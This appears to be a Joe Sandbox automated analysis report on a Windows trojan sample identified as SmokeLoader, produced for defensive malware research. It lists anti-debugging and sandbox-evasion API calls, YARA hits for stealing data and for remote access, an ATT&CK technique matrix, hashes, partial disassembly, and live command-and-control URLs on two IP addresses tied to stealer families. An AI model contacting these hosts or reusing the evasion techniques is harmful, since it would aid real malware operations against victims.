                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_00725A69 FindFirstFileExW,0_2_00725A69
                  Source: stage-0.bin.exe, 00000000.00000002.3375980592.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, stage-0.bin.exe, 00000000.00000002.3375693312.0000000000871000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_0040C12B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040C12B
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_00411142 mov eax, dword ptr fs:[00000030h]0_2_00411142
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_0040C631 mov eax, dword ptr fs:[00000030h]0_2_0040C631
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_0071C898 mov eax, dword ptr fs:[00000030h]0_2_0071C898
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_0071092B mov eax, dword ptr fs:[00000030h]0_2_0071092B
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_007213A9 mov eax, dword ptr fs:[00000030h]0_2_007213A9
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_00710D90 mov eax, dword ptr fs:[00000030h]0_2_00710D90
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_007BCCA3 push dword ptr fs:[00000030h]0_2_007BCCA3
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_00416A3F GetProcessHeap,0_2_00416A3F
                  Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_0040C12B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040C12B
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_00407C46 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00407C46
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_00408625 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00408625
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_004087B9 SetUnhandledExceptionFilter,0_2_004087B9
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_0071888C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0071888C
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_00718A20 SetUnhandledExceptionFilter,0_2_00718A20
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_0071C392 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0071C392
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_00717EAD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00717EAD
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_00408823 cpuid 0_2_00408823
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: EnumSystemLocalesW,0_2_004188F2
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: EnumSystemLocalesW,0_2_0041893D
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: EnumSystemLocalesW,0_2_004189D8
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: EnumSystemLocalesW,0_2_00411252
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00418A63
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: GetLocaleInfoW,0_2_00418CB6
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00418DDC
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00418650
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: GetLocaleInfoW,0_2_00418EE2
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: GetLocaleInfoW,0_2_00411774
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00418FB1
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00729043
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_007288B7
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: GetLocaleInfoW,0_2_00729149
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: GetLocaleInfoW,0_2_007219DB
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00729218
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: EnumSystemLocalesW,0_2_00728B59
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: EnumSystemLocalesW,0_2_00728BA4
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: EnumSystemLocalesW,0_2_00728C3F
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00728CCA
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: EnumSystemLocalesW,0_2_007214B9
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: GetLocaleInfoW,0_2_00728F1D
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_0040C9D1 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_0040C9D1

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 0.2.stage-0.bin.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.stage-0.bin.exe.740000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.stage-0.bin.exe.710e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.stage-0.bin.exe.740000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.stage-0.bin.exe.710e67.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.stage-0.bin.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.3375447042.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.3375598842.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.2129643395.0000000000740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 0.2.stage-0.bin.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.stage-0.bin.exe.740000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.stage-0.bin.exe.710e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.stage-0.bin.exe.740000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.stage-0.bin.exe.710e67.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.stage-0.bin.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.3375447042.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.3375598842.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.2129643395.0000000000740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                  Command and Scripting Interpreter
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  1
                  Virtualization/Sandbox Evasion
                  OS Credential Dumping1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                  Deobfuscate/Decode Files or Information
                  LSASS Memory21
                  Security Software Discovery
                  Remote Desktop ProtocolData from Removable Media1
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
                  Obfuscated Files or Information
                  Security Account Manager1
                  Virtualization/Sandbox Evasion
                  SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook22
                  Software Packing
                  NTDS1
                  Process Discovery
                  Distributed Component Object ModelInput Capture11
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading
                  LSA Secrets1
                  File and Directory Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials22
                  System Information Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  stage-0.bin.exe79%ReversingLabsWin32.Trojan.SmokeLoader
                  stage-0.bin.exe100%AviraHEUR/AGEN.1312686
                  stage-0.bin.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://185.172.128.90/cpa/ping.php?substr=one&s=twoV0%Avira URL Cloudsafe
                  http://185.172.128.90/cpa/ping.php?substr=one&s=two80%Avira URL Cloudsafe
                  http://185.172.128.90/cpa/ping.php?substr=one&s=twoZ0%Avira URL Cloudsafe
                  http://185.172.128.90/cpa/ping.php?substr=one&s=two0%Avira URL Cloudsafe
                  http://185.172.128.90/cpa/ping.php?substr=one&s=two;0%Avira URL Cloudsafe
                  http://185.172.128.90/cpa/ping.php?substr=one&s=twoD0%Avira URL Cloudsafe
                  http://185.172.128.90/cpa/ping.php?substr=one&s=two~0%Avira URL Cloudsafe
                  http://185.172.128.90/cpa/ping.php?substr=one&s=twop0%Avira URL Cloudsafe
                  http://185.172.128.90/cpa/ping.php?substr=one&s=twol0%Avira URL Cloudsafe
                  http://185.172.128.90/cpa/ping.php?substr=one&s=twoc0%Avira URL Cloudsafe
                  http://185.172.128.90/cpa/ping.php?substr=one&s=twoj0%Avira URL Cloudsafe
                  http://185.172.128.90/cpa/ping.php?substr=one&s=twoB0%Avira URL Cloudsafe
                  No contacted domains info
                  NameMaliciousAntivirus DetectionReputation
                  http://185.172.128.90/cpa/ping.php?substr=one&s=twotrue
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://185.172.128.90/cpa/ping.php?substr=one&s=twoVstage-0.bin.exe, 00000000.00000002.3375980592.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, stage-0.bin.exe, 00000000.00000002.3375693312.000000000088E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://185.172.128.90/cpa/ping.php?substr=one&s=two8stage-0.bin.exe, 00000000.00000002.3375980592.0000000002C50000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://185.172.128.90/cpa/ping.php?substr=one&s=twoZstage-0.bin.exe, 00000000.00000002.3375980592.0000000002C50000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://185.172.128.90/cpa/ping.php?substr=one&s=twozstage-0.bin.exe, 00000000.00000002.3375980592.0000000002C50000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    http://185.172.128.90/cpa/ping.php?substr=one&s=two;stage-0.bin.exe, 00000000.00000002.3375693312.000000000085C000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://185.172.128.90/cpa/ping.php?substr=one&s=two~stage-0.bin.exe, 00000000.00000002.3375980592.0000000002C50000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://185.172.128.90/cpa/ping.php?substr=one&s=twoBstage-0.bin.exe, 00000000.00000002.3375693312.000000000088E000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://185.172.128.90/cpa/ping.php?substr=one&s=twocstage-0.bin.exe, 00000000.00000002.3375693312.000000000085C000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://185.172.128.90/cpa/ping.php?substr=one&s=twoDstage-0.bin.exe, 00000000.00000002.3375980592.0000000002C50000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://185.172.128.90/cpa/ping.php?substr=one&s=twojstage-0.bin.exe, 00000000.00000002.3375693312.000000000088E000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://185.172.128.90/cpa/ping.php?substr=one&s=twolstage-0.bin.exe, 00000000.00000002.3375980592.0000000002C50000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://185.172.128.90/cpa/ping.php?substr=one&s=twopstage-0.bin.exe, 00000000.00000002.3375980592.0000000002C50000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    185.172.128.90
                    unknownRussian Federation
                    50916NADYMSS-ASRUtrue
                    5.42.65.115
                    unknownRussian Federation
                    39493RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRUtrue
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1551387
                    Start date and time:2024-11-07 17:34:18 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 4m 13s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:5
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:stage-0.bin.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@1/0@0/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 95%
                    • Number of executed functions: 7
                    • Number of non-executed functions: 145
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                    • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • VT rate limit hit for: stage-0.bin.exe
                    No simulations
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    185.172.128.90gcXZMzQnNJ.exeGet hashmaliciousGCleaner, NymaimBrowse
                    • 185.172.128.90/cpa/name.php
                    LisectAVT_2403002B_111.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                    • 185.172.128.90/cpa/ping.php?substr=eight&s=ab
                    LisectAVT_2403002B_301.exeGet hashmaliciousBdaejec, GCleanerBrowse
                    • 185.172.128.90/cpa/ping.php?substr=one&s=two
                    LisectAVT_2403002C_29.exeGet hashmaliciousUnknownBrowse
                    • 185.172.128.90/cpa/ping.php?substr=0&s=ab&sub=0
                    LisectAVT_2403002C_30.exeGet hashmaliciousUnknownBrowse
                    • 185.172.128.90/cpa/ping.php?substr=0&s=ab&sub=0
                    LisectAVT_2403002C_29.exeGet hashmaliciousUnknownBrowse
                    • 185.172.128.90/cpa/ping.php?substr=0&s=ab&sub=0
                    LisectAVT_2403002C_30.exeGet hashmaliciousUnknownBrowse
                    • 185.172.128.90/cpa/ping.php?substr=0&s=ab&sub=0
                    LisectAVT_2403002C_40.exeGet hashmaliciousUnknownBrowse
                    • 185.172.128.90/cpa/ping.php?substr=0&s=ab&sub=0
                    LisectAVT_2403002C_40.exeGet hashmaliciousUnknownBrowse
                    • 185.172.128.90/cpa/ping.php?substr=0&s=ab&sub=0
                    yAdC8RYkuL.exeGet hashmaliciousUnknownBrowse
                    • 185.172.128.90/cpa/ping.php?substr=ten&s=ab&sub=0
                    5.42.65.115Pp8XG0Vz4D.exeGet hashmaliciousGCleanerBrowse
                    • 5.42.65.115/advdlc.php
                    mxsujj4FZz.exeGet hashmaliciousGCleaner, RedLineBrowse
                    • 5.42.65.115/advdlc.php
                    UzMahCzo58.exeGet hashmaliciousLummaC, GCleaner, LummaC StealerBrowse
                    • 5.42.65.115/advdlc.php
                    hkXE3abs6j.exeGet hashmaliciousGCleaner, RedLineBrowse
                    • 5.42.65.115/advdlc.php
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRUyakuza.ppc.elfGet hashmaliciousUnknownBrowse
                    • 5.42.81.47
                    1730537044dd01929d6467da9e0bc05cd98b8bc5df2688589dd2eaebbc46df2ed3bf068fc2733.dat-decoded.exeGet hashmaliciousAsyncRAT, XWormBrowse
                    • 45.15.158.112
                    QmFIR949GC.exeGet hashmaliciousRedLineBrowse
                    • 5.42.92.74
                    CFYd8cbC6L.exeGet hashmaliciousRedLineBrowse
                    • 5.42.92.74
                    AdmalRLZI0.exeGet hashmaliciousRedLineBrowse
                    • 5.42.92.74
                    SecuriteInfo.com.Trojan.PWS.Stealer.39881.9434.15338.exeGet hashmaliciousUnknownBrowse
                    • 5.42.66.119
                    b2smJKgMG6.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                    • 5.42.92.37
                    Payment Advicegpj..exeGet hashmaliciousUnknownBrowse
                    • 5.42.94.169
                    Payment Advicegpj..exeGet hashmaliciousUnknownBrowse
                    • 5.42.94.169
                    SecuriteInfo.com.Win32.Evo-gen.25810.23454.exeGet hashmaliciousXWormBrowse
                    • 5.42.92.74
                    NADYMSS-ASRUSecuriteInfo.com.Win32.DropperX-gen.11998.28068.exeGet hashmaliciousAtlantida StealerBrowse
                    • 185.172.128.95
                    SecuriteInfo.com.Trojan.DownLoader46.50284.31233.3388.exeGet hashmaliciousAtlantida StealerBrowse
                    • 185.172.128.95
                    gcXZMzQnNJ.exeGet hashmaliciousGCleaner, NymaimBrowse
                    • 185.172.128.90
                    7NtKYH4Ejx.exeGet hashmaliciousNymaimBrowse
                    • 185.172.128.90
                    7NtKYH4Ejx.exeGet hashmaliciousNymaimBrowse
                    • 185.172.128.90
                    3tSeYcCHhT.exeGet hashmaliciousAtlantida Stealer, PureLog StealerBrowse
                    • 185.172.128.95
                    LisectAVT_2403002A_152.exeGet hashmaliciousUnknownBrowse
                    • 185.172.128.87
                    LisectAVT_2403002A_206.exeGet hashmaliciousUnknownBrowse
                    • 185.172.128.87
                    LisectAVT_2403002B_111.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                    • 185.172.128.187
                    LisectAVT_2403002B_301.exeGet hashmaliciousBdaejec, GCleanerBrowse
                    • 185.172.128.90
                    No context
                    No context
                    No created / dropped files found
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):6.570413348027663
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.94%
                    • Clipper DOS Executable (2020/12) 0.02%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • VXD Driver (31/22) 0.00%
                    File name:stage-0.bin.exe
                    File size:343'552 bytes
                    MD5:8b7d2590f1fb0dfd81b796f4b4723542
                    SHA1:b492d614f7749220b934127cdfc737426797890c
                    SHA256:b0968bdb6a175a38ec05efcf605ed61411d16e63e692bc0d7b8f1f747ce3b2e5
                    SHA512:5381413edddf5b7ed746fccf00560e0e326cf499b2149c2fe7fadca6511a6008d9ab6521c1bad1ab74c53765c27eed9c27a80879395597d22e2071b98dfd8f38
                    SSDEEP:3072:M4WBLuupGWmJT8kk4nhCvjzgQdeTDKnBmnMPbdyqJD2/OX3kaVw5OvRQ46+a:F4LgWC9k8Cvjz8TDKnBPb0wKWfvRQ4V
                    TLSH:EA745C03B2E1BD51E9278B729E2FC6F8366EF5608E59776E2218EE1F14B01B1C163711
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...y..b...................
                    Icon Hash:7141410943415053
                    Entrypoint:0x4025af
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                    Time Stamp:0x62F8C979 [Sun Aug 14 10:07:53 2022 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:0
                    File Version Major:5
                    File Version Minor:0
                    Subsystem Version Major:5
                    Subsystem Version Minor:0
                    Import Hash:b585adb193cc73047fae4142a994b352
                    Instruction
                    call 00007F94EC52739Dh
                    jmp 00007F94EC522F2Eh
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    mov edx, dword ptr [esp+0Ch]
                    mov ecx, dword ptr [esp+04h]
                    test edx, edx
                    je 00007F94EC52311Bh
                    xor eax, eax
                    mov al, byte ptr [esp+08h]
                    test al, al
                    jne 00007F94EC5230C8h
                    cmp edx, 00000100h
                    jc 00007F94EC5230C0h
                    cmp dword ptr [00447548h], 00000000h
                    je 00007F94EC5230B7h
                    jmp 00007F94EC527452h
                    push edi
                    mov edi, ecx
                    cmp edx, 04h
                    jc 00007F94EC5230E3h
                    neg ecx
                    and ecx, 03h
                    je 00007F94EC5230BEh
                    sub edx, ecx
                    mov byte ptr [edi], al
                    add edi, 01h
                    sub ecx, 01h
                    jne 00007F94EC5230A8h
                    mov ecx, eax
                    shl eax, 08h
                    add eax, ecx
                    mov ecx, eax
                    shl eax, 10h
                    add eax, ecx
                    mov ecx, edx
                    and edx, 03h
                    shr ecx, 02h
                    je 00007F94EC5230B8h
                    rep stosd
                    test edx, edx
                    je 00007F94EC5230BCh
                    mov byte ptr [edi], al
                    add edi, 01h
                    sub edx, 01h
                    jne 00007F94EC5230A8h
                    mov eax, dword ptr [esp+08h]
                    pop edi
                    ret
                    mov eax, dword ptr [esp+04h]
                    ret
                    mov edi, edi
                    push ebp
                    mov ebp, esp
                    mov eax, dword ptr [ebp+08h]
                    mov dword ptr [0043A200h], eax
                    mov dword ptr [0043A204h], eax
                    mov dword ptr [0043A208h], eax
                    mov dword ptr [0043A20Ch], eax
                    pop ebp
                    ret
                    mov edi, edi
                    push ebp
                    mov ebp, esp
                    mov eax, dword ptr [ebp+08h]
                    mov ecx, dword ptr [004354ACh]
                    push esi
                    cmp dword ptr [eax+04h], edx
                    je 00007F94EC5230C1h
                    mov esi, ecx
                    imul esi, esi, 0Ch
                    add esi, dword ptr [ebp+08h]
                    add eax, 0Ch
                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x3437c0x64.rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x480000x1a8c0.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x2f1e00x1c.rdata
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x33c700x18.rdata
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x33c280x40.rdata
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x2f0000x194.rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x2de760x2e000f6f6f9f0fa8f0eae5d4b4cfded21a7a5False0.7982814622961957data7.538305971867237IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rdata0x2f0000x5cba0x5e0048759bc42397773d366f3362ad6507bcFalse0.4256150265957447data5.810835322343505IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data0x350000x125640x52007096d9c211f4e1382ddd6c61e3f5e85bFalse0.10642149390243902data1.2364473648857537IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0x480000x1a8c00x1aa003b00dce7157587a18db38007d1d3df12False0.39469630281690143data4.658179050690975IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    AFX_DIALOG_LAYOUT0x5d0780xedata1.5714285714285714
                    LAW0x5b1f80x1e31ASCII text, with very long lines (7729), with no line terminatorsRomanianRomania0.5890800879803338
                    RT_CURSOR0x5d0880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.2953091684434968
                    RT_CURSOR0x5df300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.46705776173285196
                    RT_CURSOR0x5e7d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5361271676300579
                    RT_CURSOR0x5ed700xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.26439232409381663
                    RT_CURSOR0x5fc180x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.3686823104693141
                    RT_CURSOR0x604c00x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.49060693641618497
                    RT_CURSOR0x60a580x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4375
                    RT_CURSOR0x60b880xb0Device independent bitmap graphic, 16 x 32 x 1, image size 00.44886363636363635
                    RT_ICON0x489c00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0RomanianRomania0.43390191897654584
                    RT_ICON0x498680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0RomanianRomania0.5505415162454874
                    RT_ICON0x4a1100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0RomanianRomania0.5852534562211982
                    RT_ICON0x4a7d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0RomanianRomania0.611271676300578
                    RT_ICON0x4ad400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0RomanianRomania0.4446058091286307
                    RT_ICON0x4d2e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0RomanianRomania0.4950750469043152
                    RT_ICON0x4e3900x468Device independent bitmap graphic, 16 x 32 x 32, image size 0RomanianRomania0.524822695035461
                    RT_ICON0x4e8600xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsRomanianRomania0.5170575692963753
                    RT_ICON0x4f7080x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsRomanianRomania0.5103790613718412
                    RT_ICON0x4ffb00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsRomanianRomania0.45794930875576034
                    RT_ICON0x506780x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsRomanianRomania0.47398843930635837
